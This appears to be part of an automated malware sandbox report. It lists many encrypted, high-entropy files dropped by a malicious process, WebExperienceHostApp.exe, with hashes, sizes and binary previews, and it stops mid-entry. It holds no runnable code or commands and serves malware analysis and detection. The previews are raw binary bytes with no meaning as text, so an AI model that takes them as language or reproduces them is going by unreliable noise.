                                                                  SHA-256:46516FE7C392F081BF66C8898AB4E84A7A96F34BE11812D78387D924C89A2701
                                                                  SHA-512:4CD69384D8582145DCDEBD303A5D06BE35640105070BFE3B5195978407315721C314BDF01949B579E3C2163BE3792F439EB229462F59F24AF75675E0C89EE990
                                                                  Malicious:true
                                                                  Preview:.MS.....h3..G.j]N....$....a..z]|.~..:..U.M...t..xD.G..A...k........`..M..|......W..G_.D..M.^....6.^,..........#tK..j..w[.......=..8<.../.)1`.?.=..b=..}.:W*?...j=.YN..[K_.R.._.>k..Uau.w..r=.,.U.Xo.....k$.....&..)R.....P:.f...s.+....N..e^?0m.z.T.yy.1..|.?.;.....rx.....V......:z.+........._._.I\....Ao.....F.5.XDbi....._Wo...82$. ...3....5.Rxj..U.on}B...W.#....s.";s..J.o."6.....o........D...K:A.8Bz\....(..`..O.e|...6.P..Rz.X..7..$..]..7t[........X..ebm.X....'...g..-g.p.N..t.s&.f..})....!.... ...A.:.V.6.......?.M.D^E..K..=..t%E.C..'.s.P..Q....J..%....v.g).n2.F6.k......-p7f...D.'...?.~....X.Y.G+*b`....,....O*P..../.m......P.A.....;..0..._..#....,..)/.....Z$..L......?./..f.I....%........"O..JI.....YH......l{k@..W.|..YV..$g.R.b>...6.'k]..P.b.L...5a.G.u.n.m~..h..!.(....C.....c.fw.X..f0.E.......=W...U..W.5a5u.....4... Q\.\..".=........z...m.W..,..@;..-..X...w0]e../.....OB.:..2/u5..Z...]iLx.?..T.*5C_O4....:..GOz..>}...y.Pv%..M..B..G.t...
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):100094
                                                                  Entropy (8bit):7.997994030199969
                                                                  Encrypted:true
                                                                  SSDEEP:1536:4C0LGTTEuehZrfqJUxkr/lnQ8UsiR522LnxWQSoQiyKLqu31JAu0OwIhw3268sz9:4P4TuPcUjNsiR5znxWH9uK7rlDd6e
                                                                  MD5:F0A1482F87DBC0A6EA2534F322C4E682
                                                                  SHA1:FDA1221CA8B8CD3B8B48B28DEE843147056D402C
                                                                  SHA-256:A5E971105C37425154E1DD5E71247091F02B2E57748E91C7D8B36EA57A195F01
                                                                  SHA-512:8964C4E57B9F08C4D4E0EF2C5B537FFD4179BF7D702664CB9D663B6453472F10C9F8890CBCF8210771C988F1419C1F375BE7626B715E08E5A4B510622D569B99
                                                                  Malicious:true
                                                                  Preview:@.[.d...J.V.7.'.q.B".....{..k2%..d9).RT...Z...Y..3U=V...4<.y90../.3...p.....7pz\.d../.9..0...B.....;..)7[.5ey.d.6...5.b.byD.....n..`.l....o.....G..`...<W...e+'..2..W...]%.....@:..Q...A..=f.2...hO.j...H.3.....WH.X.L.5...3E.8.t./../B>.R...H.......cv[.I..g.......UbA1.~..2../.....~+.....g..........C..I..}.R.._.q.|..)...}.....0...phK......7x5;..h#>d,...wn%.5.J.h.Yb.....;.?.N..[$7xi....|C../.3.....f.u.{..../.@61..H.[./.#.n.8. ]1#.x..|.....$`+g....Rq-..A..K........Z.c-2!L.M..}E....?..lF..)yB..XN..K..6V...dja..a..l...s..}...(.......Z...[.,.......(...f+.q......(..O.UI.75.:.j>E,V.u#3.T...q(...\....]\QJ...G.6.tO...O@..D.....X..)..6..s.U.]....r.Bw.8.N....d.!#.....@m....]._T.....j?...|&#s.....=.E..~.......z....,..>}2..{X...o...............+. .N.-.....v._....JM.-.Om8Z...5...|J.v0D.F........u....@v.+.=C3......#p..G....}..&:....f..>........';.6....*,"..ud.2t..1>.&1!T2.-.3.......]..fE..G8u.....?=.w7.U.g..{..D1..>J)...~%(.<.HI...B..M..H..........+1.Z...
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):32346
                                                                  Entropy (8bit):7.994039415758425
                                                                  Encrypted:true
                                                                  SSDEEP:768:x9J8z9q7p4SWZ9CYwLHGCjNZQPahYvLH331gfNhCx:x9JGiLH/0DvLHHMhq
                                                                  MD5:E1FDD9D1ABBB0B1F09208E265B077A6A
                                                                  SHA1:51C427F0101EB3FB9106BD0D0A33242CC855C830
                                                                  SHA-256:4AE05BB16A695FC499A84E5129F8EAA628FF602DA7F75D04397EFF16F24BB541
                                                                  SHA-512:AB875717F617CB341AB74543FC0B0AC374CBBE87E948AA5C3F967A40BACCC0F31BF57E28F4A3FC5034690487B8B21FEABD183B72B8B2043BB2A411A149A14992
                                                                  Malicious:true
                                                                  Preview:A.mug$.k... .iYj...Ae.0.H.y.F.g...FQ.j....].#...X......3..v.....sp..N ...H8C\..)iL9a.?........{........]...y..~.9..m...d_.o.=..W.!.6t.........5. .:H.%......d..=y.oU!!..^......_..X?.gwkn/..-..I......r.1......a.... .ax..l...g....-5..M...M....e.L...#.T.h8o.........b..].Ub..IH~P.....2..<.<.g4]..b.zv.^S6.F.Q;..`.J<.A.j..vwN='..L....k..1..f...o.#.?.3.-b..(..0xx.........j..-E..w;Kf..ew.y.\.....[^.c~.........WZ....w..F..<U.....h v..W...=...+.H}.O.zZ( Oi.Il. .F..<!G....}.8f.=.*&......\;...z.~..^..t ..T.n_z...7p6.......(..J..6`0......@.......#w.r..q.|..r.;..2"..&.7...G.:K...{.m..M.L....#Q...Ap.S..W:X..g.8..[.bln.%'..h..kP;l.:.0l........E..=._9l.I..WS.,......_Z........M7Q..L@.~R.'..........U..;...T@..Qp.K.#Z.Pj.z.Q~K.w.-.....R.<.)Y.dj/4t..^.@...d&Z..K@....g.t8..?..M....{f.d>....}..r.B...z]>.J..}?...x..L...x.H....n.C.y.....:.wo...F:...aSg..T.z.>T.;.>............''-xfoVS.._.+dY....z....!.".q]17..;..).,DFT...g\...-..Z.X-a.4.0r...'..*....8Y....UqK..X
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):88688
                                                                  Entropy (8bit):7.998058346676402
                                                                  Encrypted:true
                                                                  SSDEEP:1536:icUGQY7EltmtVxG5+FIq9RkPyZT60Hqo5gYyCUGdZISaxRRppciYxx2W:FUGQiElctVxGAF74yrb5gPC3dZuxRRpG
                                                                  MD5:B9480F498E4BDB8F6664CE744C779497
                                                                  SHA1:612BA2991EA659695707B2DA7FFA75BA4F781D0F
                                                                  SHA-256:B89A5C62BF196176FC4F232AD2D4D57AA1687761B1962A226BDD59CE90812826
                                                                  SHA-512:42C619F2F647512921FB56C0BF2E51B1D43842B356F6E980DB0E2E13EAC1682D5AC4850010EAAEA45E553BF54A32AF78BCCDF0CACA2B9EBA15AFFD37B04308A3
                                                                  Malicious:true
                                                                  Preview:n.e.d...2..J...cH.'.N.......VL.l.S...v;..a..b......*?.F..^...e@c...l..W..:.;.Q.....=.Sll.3....5. ...ms...(.....`-..a..8.-}2wA.+.Ih..w.I-..]...]B....M}.[$......o......>....w..n..$.?2..6PR..b../.*.!..........K...-#..`..W..2.._,..$....>~m=k.0.c..vL..PF....&wJ.D.\....z..... p.}...?u.........L.2.d.1.x:....).w.@;.b......B.o...r....fb..B.q.k....f~..[c.....KMd.x.......#...FU.i.!..q.....k.^..b`.l..2...|?...L.....gs.PA/..r..j~.zG`.....n].r5..Ef"x!....5.ytg..&..2...j..?'<.....E.|..~..).V..n.."..!....MyW.d.......~i.9@...C..m...VW.p..ee.r..:...u.....5....:9..D..k..i..;..$...M.!/Lc......Vz;w.:.'o.^.v.o...U.8lQ.6I....~..\.Y.fg..z.V....cM..&.j.... ...P|....).a",.C..[a$a...:...D.Q.....0.).J...9.I...I.0.@a.._..BLB.R2t.hE.O.z-..O..p.v..0>ET...h...WP_.c."......i.V.P.d?%.2..I.W..O. .`...8.P.../.....hh.2N.,s5Q8..w...m.TC.H.._..o.3..R.BZ........g....y.xY.p9.._-\[.FR.5..0[TZ_9.wA..]T'.{.`...rO..b2....i?].I>......D..F_._..W.<'.....B....5<..F..k..V. ...)L-^.....[.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):44827
                                                                  Entropy (8bit):7.995942694972688
                                                                  Encrypted:true
                                                                  SSDEEP:768:ni6L5E3Y8r6Ec1afjHgn2ZkGdzuDW7kC9ovqXi7vQt3LM:dtEOarHC2WGdp7avX4NM
                                                                  MD5:23CB464D02358F12140C48D04ACD6729
                                                                  SHA1:5B091EA2A4418DA5D02BC92F14C89AE91AFE3CB3
                                                                  SHA-256:205B1D074CCF72952051ED927F9A4AF2316E55A8CB64DDD2324047878D4AE06B
                                                                  SHA-512:D97C5B264125CA3AA56C5E22F035584FCD36ABD15D53903C62375D689C30421E8C5605635DFE58ABC29BB8D125108460550B9180F2F9708D4EBAAD9C834B8BAF
                                                                  Malicious:true
                                                                  Preview:W.q...0.-n.g.Qv....n.3w..AY....i...v..>.T...Ve.xA/VF&^..$..t..cqz.k.|.0E.!a.]/...0.wh..."..k_x6L.V....<$...JnD.+..-cs.n(..o.s..KRq..Y.j.[)s2.!iLr.....Y].....g......I...#./.!,....}l...a....k.h>.......u.b...<..be}Q.. H.W...Mo.4.B..,..9....v.$)R..,..m....v.4...V.o..pI...j..6.M1.....T.g.6.o.h.x.....+.+... rp......87..Y.BS.3.H..xep.>>.z....1...hl6...........A....VCa\.....P7mV........M.'h7..a.......4W(..e..Ti.Z<O...`.CH.P...%....L..3.........5..mlX..a.Q....L.......YR.wLt,......oH..\.....A..c|..%....S..f..n.S.h.......QBy-..o.........\?bww.`..V.._..........&.......W.....N.1..m.+.\ctO.x.\`.z|....l.u."p:6~v.E.+v./.].V..f.O?...g..H.?..C.O/....T.......5.C.\...6..l....c..l........=.G..-l.-&@.ot...........-.oo.t....q.~5...h.......u.(........x65..iz/.d.............m...,A.,b_..WR..>.......(...#.]]8~v..>....?..R.K.'.wo.7......:.P..u..$...gY........4.&.v...h....i..W.n9...?{H:..e..nts...v.2...R.A......4.......CG..].}0.f...:...P.XjT............C.j.4^\.>._.e......
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):99045
                                                                  Entropy (8bit):7.998323358485621
                                                                  Encrypted:true
                                                                  SSDEEP:3072:s8wPhipsI0w89RcBK/1tPPSOmvQy6Y9LlDA2wMjcqeaR:s8wP8pZ0V4B6PPaxnLFx4qew
                                                                  MD5:48E6554F4F4405862EDDF45E5DC6F8A4
                                                                  SHA1:2DDDCAB47EA2C9849294D219656EB644A59B1D9A
                                                                  SHA-256:82C20D9281F8EAE695DDEE981CF74000BCAE7768664A1C8A4F6367831D57C15F
                                                                  SHA-512:951577D2FCD52939991B9F4C2AED3BBD10E9A41F40E635EBBCD440F1B1CFE2B950472D6B00305C96E390A5B5F863B35475CBA130FF3531CD56C3CACFF7EDB483
                                                                  Malicious:true
                                                                  Preview:L..l.I...'.F..RX...B.....`....5....Fs.[pV.8;r.l.(.Y.a...SqD.u%.\2..6...I@v=....@l.`..Hq...r.'/......s^.w.K_Q.q.OW...:N.0...w.2.8. .q....7........c1."DY!U......+).RM...U.\../GK._..$(^...2......."...o.,...ru.B.{ 74..X.#\.....@.7R....f.P.basF............V.i.G..s5*5.(.....qm.......d}..p....T.........7..H@..NfaP....D.7.e..xM.-...e.o.g{..c(fG..k.-.d.....9^Xk.nwI.y.\.w.*f..&.b0..M`..........).?..-.9s..b)Q;.....j\#.ty...CiQV..K.=V7G...&.z. ..:.........9?...Gg..v~M..UYa$.T...Gw.=...s.O..M>..4.l.-v....=...2Ix..+..^fX..~......x.v.}..4..d. k.?:.@u.t.E3D..#...%./.%.rl.iy.}...p..l.z.{`.........:.n.*.....".F....'X..Q........w..&..(.gQ.)~...k..Z..'.Z..Co.Y.T....w.t..m..30.QeLr8.x....*v.4...uh././L!...p.9..].O..g.O..x...|l.tHr.KF-`.r.......kl.3E.y.5.iSd7U.;9....u.!G....q.=...~.JA.8...G.......a..V.5..v....%F.M..~ah..3..P.U..m.....v.I..%;W}.....Jn........e..y.!....%.z.G..h....(,K....eN.xo.:.?wz3.e^L($N..v.DT.5.\..f,-....C...i(..vR.[..;.2..T.5.2.....{.3.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):38207
                                                                  Entropy (8bit):7.9947466799324705
                                                                  Encrypted:true
                                                                  SSDEEP:768:ZwW1wsM1s7u1y2rJ6pyOlQYhw91TgsH6unjIswH48TWVDbxKITzsmnO:GIu1yMJ6JFw4sayQR8jf1O
                                                                  MD5:78566E882108340849F23691ED8927C8
                                                                  SHA1:264B95F11EC8A61C572FDAFA6A67F59CBFA710EC
                                                                  SHA-256:133BDA06B66573656FCC497819FA8BDB5493D6B224354D10C96A610AA7C0F97F
                                                                  SHA-512:383CBFFB7C0E58CB84E2FB7D3A6C0E22BEA7C8022D8F96A5A03A388D451F79EDEA9925A9ED5A9636977C20B91F928F94B7F1E978EC39FCE0DE2FB6502137EBA5
                                                                  Malicious:true
                                                                  Preview:]x........d...).Y+.*K....S.#...s>.x..................Uo..;...~O.........E..W*..........re...N.y...3.&.oG.h..C.i..^K...*..Y.t..-...}=...r...h...h.r..zXQ.W'.7..X...5..)]".7$:......%..0....2..98..6j(.S..l.../ ..:+ .n.$.Q.X..}.*..Ki.bHZy...G..P_.".5........(f]..o.f...8K.P.F.~...Z}...!.;8..G .....1.....>...'F.+.m1.....l.O....G...I!x6.\...[T.l....w..7.......I_P.....G..A......[.....i.XYr_h%.[......Oq.....qZ.S.:.}.........X.1+y..8.....W{k.t.P.I.\.7.....%f<.2.. ...>.dT.I0..@'=....O..0...pd......#R..K........U...M .*q`..a.....n.C.....m..f.*..k ...w..;...&Z.$.>.......yu...)..6.C....J*..m...b..D..dW..q..+.0\.$..+nHL).@t.>HXs@.+g....*.x.....~..4u...x..L...-.3.2.e7vV.@.,..+............bK....xw......J..v.+.X.h}..T* KG.u.+..........h.}.(.w...!Mc._.8.?JV...\..z.,.[CR_Ff.g..88....r*..@..r"lc.>..;..V+....g.^....).....`..),.0..|5.~....Z.s.O.N..>eN..*....J.......z.X...+....^3aWL....F`.s.`[.c.A.+..D.<z.n.v.X3..o1...".....1..fq...h.....C....+.N.b.."Q...;...Fa.e.s..Q..
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):116135
                                                                  Entropy (8bit):7.998330246951078
                                                                  Encrypted:true
                                                                  SSDEEP:3072:/wZO6Y2tBn3F7/iSFLoeiXXI+6X3Ulz605Y8TDZ:UOd2tBnV7/iSFL3nUN605Y8TDZ
                                                                  MD5:D50B23986C13A978079383F95172FC0E
                                                                  SHA1:9CE4B4078BBFD50D6E8465F059DAA3F12D19583E
                                                                  SHA-256:CEF39B404EC3FD029098A5DDD2E24CF39E35E41C11636F63AC5C6C2E7D0F1704
                                                                  SHA-512:9465A9718D08669892FF2F13692DFF9612D4AD23172FCF1A9F154C54A565920C9F7EE9FFE80FF4582D9B361E0C4916D5DC435113E061CF9D364EB6F9BA0AFF99
                                                                  Malicious:true
                                                                  Preview:.'..Q....-.......~).e.4.d..L.:U.....{..t%...>K....R.8.....rH.;....&.eRk.h.".s..a.03........D..|o..Hn..g..=...'L.q.,..........v..`b2pF.b...F..L..58.BO....D...f.[..F7......f..6z..CR.Q.5.......'n.iC.C...t.....3..%.+o....b'\.Q.u..P0..6.3.*......../b@..H....-....t..]O...E....._~.K.?..I...U....e_8..4.....h..n......<.t.m9...'[Y[.f\M.+...91.."3].+...U....I....u}..U........1=R....^'.(t#U.0....x7......<d..P...cn......1J:..].......(.n.Ieg..v.0.)3j..H...D...d8n..`W...z5q.:.?...|.z.M.OG.K6......>..`5.....*Y..$...F...~}dS..u.?....D....2..$.,.f7.\...go1.d,.'<Y..Ls..-g...N.8].C....Y..\.n-`.._...].u..~.......4.h...x!.2..c.c..G......t.M.......,N.[.....ZP....l.s...l.Aqi.g....L.].a.p.J3!P%ML...-....s..+.0...e.T.{w..G...*........H<...^f.....A./..2..#....U.N.c......L.....w.D......`..rrP..N^]5...'9..'I.....6K.)..l...!...V()....#..H..s:....,...IJ'.R.`;L..^....|..O.?.^......_f.s...~....8...^-.]..Y..z?..u.^..cC.A.[.a...G...y*0....Q..U.Y.....p....~G..Y...@.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):68742
                                                                  Entropy (8bit):7.997258585330826
                                                                  Encrypted:true
                                                                  SSDEEP:1536:9qeBnQ+LrvqNXwezKu8uQn06e6kcygVAjrDHiuH8T3jRo3o:9qPAryFw5ui036C7bIjRo4
                                                                  MD5:FE99BA70AD426A1D5CCBBDB72097FC9D
                                                                  SHA1:0533475AA1032B7A6FF63A6B623F27AAC1706A12
                                                                  SHA-256:33EE1304C42AAA7E1B45B4D4C61F9F3AAE9B4EAAA7F87732736F1DD54F3D0570
                                                                  SHA-512:6A4685298184D97652813AF92BBCE9D1B2E61F4AF75F3166F8FDB93FF6D447E4B337149E8D7531A2D4F20AC772747A4F51AD7BE2B7666EA519AC9EEC84FA71F8
                                                                  Malicious:true
                                                                  Preview:ZK..X...1.B.....a.}.q..K.p.G.=.q.h..j...I...4.B".4t....%....24.|+56M.~..L.K/.V4p..)w.....&.<ge!.!..MNT..l.'...i...'.L...|..f..g&.{.$5..E..RcN.MgS....p$.2Sb3./..u.$u....{S%.7..uX..S${.....q..P..0..K.`j...{L#..9k.xR.w..I-1...........4`..n..(.vl..2...t....sg.,..qe..>...m.d..Ft\\'..l.&wR....`.x~.a..V>..y.5j.>..........t..3.]d..^a3.^4.l..c..M>..yU+!.....=#.'..o..I6+7..F..@.s..........^......SX..........6uxe...i`c...j.E........r..QL/...zN..G..w...}E/..\.-#%.^..X.2.9I!...*M.......M6....*...*.=/....L.,......1... k.I.....)g.!M.\L.}..L........U.. N.4.L%.....l.`.1....".T..j.'Y.I.....v...h.....i.......!...@.......J.BR....;..M...nA.jw..b......_Qp..h."..=f<..I...-.sb...".t.$.........u)C....&.........D...].`$..L..B*...x....%.p.j.X..we............2...zc{3P.+..\....s9#..[}</.5...3O.yR.Uy....D....>.~.....0....B.......^......<......2..3.$;...X..o'..;..P..8R>.-.d....(.....x...qa...g......M@>...../.\c...`.2..1......n..&4..8.L..~#2.\._..t 3..$4.o..1...Q.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):102059
                                                                  Entropy (8bit):7.998054597912209
                                                                  Encrypted:true
                                                                  SSDEEP:3072:fDrncjHydith2ibxz7GBCTSYYRq3rAfoJ8pUuq9:fD7cjSE+e5GBCjYXf5M
                                                                  MD5:81923B3A609FDB4DAD140FFE96FF02EB
                                                                  SHA1:D9B260203958CED71B8DC09C184C29DECDBA9A50
                                                                  SHA-256:CA5CA7DB7BD029BCB69B697A7FE62372EA9161432B9DDEC76A55669268507EEC
                                                                  SHA-512:9D683803E563ADE4C4BF010AD89629736F762C15F9E8F60DD68C1344F16FFCB416548EC2AAB63AD57A94DCE1AECB65B79453ED9B6AB5A2E7BDF376A64674AD63
                                                                  Malicious:true
                                                                  Preview:....;l......_.~.-*....g.].1.9".;.^.NY....J...t_..d...}`2.....0.R.-......].&Y(.....mI.X1X...Y8<.+.3.X/..:...5p.LN...8.+..)dKBs...?...p.7....8."..#..s./.'.:H...N~.b.....76.........._...M.0^.y.....a.m~H%.....K.....,#{.m}.....9..&.....e..jWX.sG..(<..&.$3........!.R._.4#..*.....DQ.).^b....#..0.ICF5.....CW......:VH|o...d..2ks...K<..,..+...I..hH...T...,U....m.>.E.....Jr.!.......>.7%.*.c..........c.J&..Mg..?b...U.....J...K.ji...k..:.)kg.k.C......!H...7...6.6.M./.H.v._.PD.Q.n..2...).l.G..!'.!.z.>..-............8w.D.._..;.~.........d...t.).M....Kg....x}t0.{C;....W+ 3......LF`=.|\.fs...g=*.5..@....}.P..........o0wP2Y..n..5J.ZC.eA.z.E..*l...H`....6..{`.t...(*.@.k.Y_u.m.....K...t?...H...["....k.0....W.-..Qd...5.[yh.).A.....2.......Flz.....rD..W..K.H+.+..Z.1.Pd..._.e.......s.....K...E.....p.L...<.%....~..|.u.....TsY....h.U....J.P....H.t.x.B.....y.......I.>v..T.Dv*...e.E"..0.\A....aK....u.\...g....m.W%.]...e.h..y.U.r..^I,.v.b..j`..o..s..*mWU.&`JT...im..o
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):34227
                                                                  Entropy (8bit):7.994011364088701
                                                                  Encrypted:true
                                                                  SSDEEP:768:5RLYERYH4L8SlMzrhvJ36+Xa8DQzA83OChRyOrkAJgQfGHCasB0mgh:LPLMzrhwniQJ+C6ckAJgoGiasamk
                                                                  MD5:D167B1697DE3D85C00EF40F95B0E11D9
                                                                  SHA1:251EE1E1D23A13C5B473161E64971D7D8E31F346
                                                                  SHA-256:78A5531945A812883687C32DA4051841EE0EDD31F3A09B80819E1A0B25B5214B
                                                                  SHA-512:49A1B9C322ED08DECD5FB0FD2664D815D4E405683EF48477FAACA63F953E20B283FFCD042E7806722C81A1824A938F29B1A6368FEBE46BB58C9A220C80436229
                                                                  Malicious:true
                                                                  Preview:../.....tZ.O.J..V....Q.XQ.y2.g.Gf....{a...IwIL.+(...6..L.K.RB.8i-...qC.`....9.ga3..w..5E..6...-..&Ho....@.#|..ZZ..J:_.s#..[.z...Q.t2.z..2.(..e...B.....n.(...VQ@......3...m....al.)....y....M.?..QZn..[..=T.F.....-....m.....D../F+O.@I.WV3OI+s....(.L[g_.3...t.N...6..=.&>.h?k.Q.U8-...R.V..K.....:R./.....c.......[.M..c.....I.....Gq.>/..K.y.l'Dg.m.!..<...Zk[.o.`...$..M. .Y.!.TR+$.U.4.E.D [...\...(j...n.uCC.E<*cR.....k...^.t.&......|F..............M.k.K..#k.L....4....FJ...Z......&1....w.:....%...3.T...Y.........st...d..K.].P..St...C. 4..]f.....V..4..7!V....t.._Q..)..]u_..D..xF...,.._xi....Q..?/@..7....D...3.g.vD.P..-..n..n.#....<...;..p8!.Q\w.}V.\OR.:....!6.RN.....{|.o]..npm.g..1Y.....B._....y....2x?.H.!...a.....e..$*:.o./...}..u........jw4].0!... .A...|7b_.,H....'.......|.#..d.4*..x.....?.&.d....#.^...G...P..L0b....&......}..O_l..`.g......zf.i....pXX...C..`|t.;.4..#0..:.G..2v..c).....B.N.8...8w...!0.|..Z&8...."+T...Lf.D..o......b.W.....W...M
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):92795
                                                                  Entropy (8bit):7.997902034189043
                                                                  Encrypted:true
                                                                  SSDEEP:1536:5KZwmro+0riVV3gvyVnbJd+l25h+BIyOCwWHTGBtHwPngp+svh/R9B0m2:5KZZb283g4f+lKyj9H+tOgNh/R9B01
                                                                  MD5:D3298F0CCB234B675ABF50B29B936BC0
                                                                  SHA1:29C8172D490A607E2C611630863ABA4BE6D09C74
                                                                  SHA-256:F80CA1132AD08D38D7C5C242F44A35C003DCF873AA3BBAA86165392525734463
                                                                  SHA-512:D30CA14D12BD31026513068B5145F7268497996529301CEB683EDCC25AD4CC0AD7E9435179AE957638DBA87F0A3B68E0E3E4BE89FFE868BD01EECAF3C06CE1A1
                                                                  Malicious:true
                                                                  Preview:d.I......g+`..OJT.-...T... ./8.D;..4.P5neA....(."...WV2.G.".:....f..@.BEj...>!..Y..fsq.X....g...#?L.....C........o.4(.....a..M1".F..c.....`..>...jf.,y..h.t..(...\..K........,'1&..1J..=..3.Z.-.h..v-e..n3.~...}...G..t..."N...'.8....A....2......\.c...f)j_.6n..|......f...L9..uUa..[...g...M.%.V...J.......)..[...|...$..N2r..2.....t..& ..o...d'Q...N....D.Q..xB3.[...+..V.).....@....2I.]..w.4....a.C...Id.........O..h......q`"........A.%}..!Qn....?...........LV|^~....#qA...c?.....(...6.0..Xw....ag...Q.}hF....V.}ut..T.v#..JQ..+N....^#..16i]..u.M.:.F.k.[.1..3......a_t)...e.7...$..b....)...F..0...v..R)Kw.a]C.l,.XB....0z..R...k(.I.H.[`..5<,1>.....$.":.E.#.R.q...[! ...4...mx'.C.j.&....d.hO.. ..j.......Q.E+.-h.._z3..%.S(.o.Y........P.4......bb...@.W..0.....E..._....2.H.EH..k[...Y. 4O.."[M.......]$J.B...?.uLG@..-E.=C....l.....ex.}**.G'.=m.Ji4.....q.F..;....=T[D...}...T.r..oN/.cDXM.........'..cup.4.../..,..........=.W0...l.x.O-..5.e.9T.!l.Z.!,.BuQ....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:OpenPGP Secret Key
                                                                  Category:dropped
                                                                  Size (bytes):29025
                                                                  Entropy (8bit):7.994564520642329
                                                                  Encrypted:true
                                                                  SSDEEP:384:Y+/SehuqOmgpejZj1Zn6l9248d9n318ayDnH0QlCZbCk0fcpyv82xy6t1zub:N/VdOmgpe1Cl9Ql8ayDUQoZYfpM6tdub
                                                                  MD5:2B776F43903C96EAF10BD758DFBB9177
                                                                  SHA1:4F9E9ECD4028C3ED39DA3A481A8146FB3D4F16BF
                                                                  SHA-256:E8020B2D733E5200514C54C6401787669F72EAB2692119A39BE31A847D4A4303
                                                                  SHA-512:52D3F47DF943E8EE1A0AED108B318400B25B2FC88168227A828A637BCC3B9D37C46212388D2EE393F8B6F73B60B129756FF9AA85F0540E017ECB1A2A64708376
                                                                  Malicious:true
                                                                  Preview:.2"y..Z#".g.~..}..g..$..A..3q......,.Y.&.......;S6..(.Eo..?.t.Q.C.g.G.P&.1...j.!.X.\.1ET......n.G#.........~..Z..V..~O!.....j...J...'mu2..n.B1.K.G.o.}.A..^..-t....{.....e.T..X.h.LC..^...:c?......K{V..8m..r..*....)g..._,V..8.K...^[C6..ln.....|.......y..../..:....Ov.../...R..!.S..^..MR.v...:..z...V.<...2........ln...'......9..9.._.@2..(zXq...7...K..s..Az.)t...Q%.Z.#...G.^W..-h....A._.=Q...L......K.[~Y.Ab....:Uc4....\7..A.+...u~%..).@G.{pS.PG. &.9...P........6....n7..\c9...Y...dp.C0!...X..+..J.e..O_..#.....D..A....J:.".._Z..t....2...B3>.#....k^.;...Rol?.y.A....&'.|........4.J......H..i...,.....L...en6......R...<..}..`.......)...%...DY..q Q....../..J./.....6/.}...9R.....{.[..ki;.....N.........)d.c..t.....Q.Xs.?^L.....T).={.H..A.ptX..t.A.D.."..C.........G|.L..Wn..I.t...p....x.c..4...a...7.;..F...1.....u]"ro..T.p..I..!......||3.qF....=Ta.7.-I.....o.c&.nf...Lq....c....q6...^T....KD!...M?..d#.....:/......Okb......Yb'w.|>.k>j.P\..{...Y.......l+q.4
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):207268
                                                                  Entropy (8bit):7.999051433228926
                                                                  Encrypted:true
                                                                  SSDEEP:6144:dANzec6KClGKkvVBspri0LDCyDuTBowGV:d0zQcDLsBiiPDsBowGV
                                                                  MD5:D8433EDBEB1E761FA6FB5E3991071843
                                                                  SHA1:A57AB810A4D4C99C4A9608EBF391B3EAFFDF6325
                                                                  SHA-256:32BF3248625803FC2DDDF4768C161524ABDBBEF37AFE2318D1C92744397957BF
                                                                  SHA-512:E2482AE0BB95261387E696D9B007BBC956F9BBF6BB79388143A89778D387FAA9CFD3309DFEB80AAFE32EC8E7B3D0417F9CCB161B4314CF5ED821AEDF1FFE799E
                                                                  Malicious:true
                                                                  Preview:."h.....(h..".....iiR...........:..N.=V(Z.t..dS..*.y..cw...L.b.x.;DGk....&..&....I...#.+.K..PB.)s..\.B..A.[fa-F...CrC3...E..ps5.)./.k..Wo..V.....b...$....z.X.=%]..c.....<...9....;.*C./....`.f..L. _......... }=\I..|,H.,.........s(..DK.2.-.[...J..Vd.....4..0.:....!....k..f..(t..+..O.wl.7....y...5.GWJp/.>..|..};..w..C[k@...........02..jt....b!..MtU.......3........a....q%_..s...;D,.[7..A[-.(\IB~.+.\..|...........R.i....@.I.)...`...E..g...9......".$".Z.b}..:E.=.+ze......S.p5.../.|........cC...X....<...S HH....9G..U2..r..1..e....}.g.P.*.....p..u"...F.........d..E>+U..g.|.....-.K....".+O..C..d..xr..................R./ix.z.I~jRrTn....Hz7>..:.i ..Q...$T...X.].D?......d....K.he....N....&...tD.N3.Jj.C=..A=..?".=..c.m..e...!#..[.{.a.m.~....^...G'C.o*n.c.M...$4?6_...k.k.0..#F.B...W.R...{.GJ/._.In'Y#...z..E5vm.B........N..y.>.....-]...2QW.dH..5L....;..J.ZP%UxW!n7z..).\xi..H.U......I8.......7t....l.+.yDr......Q..`R%7.r.d..}._...P..E.g..I....D{Wvd..I).
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):86805
                                                                  Entropy (8bit):7.997904103001202
                                                                  Encrypted:true
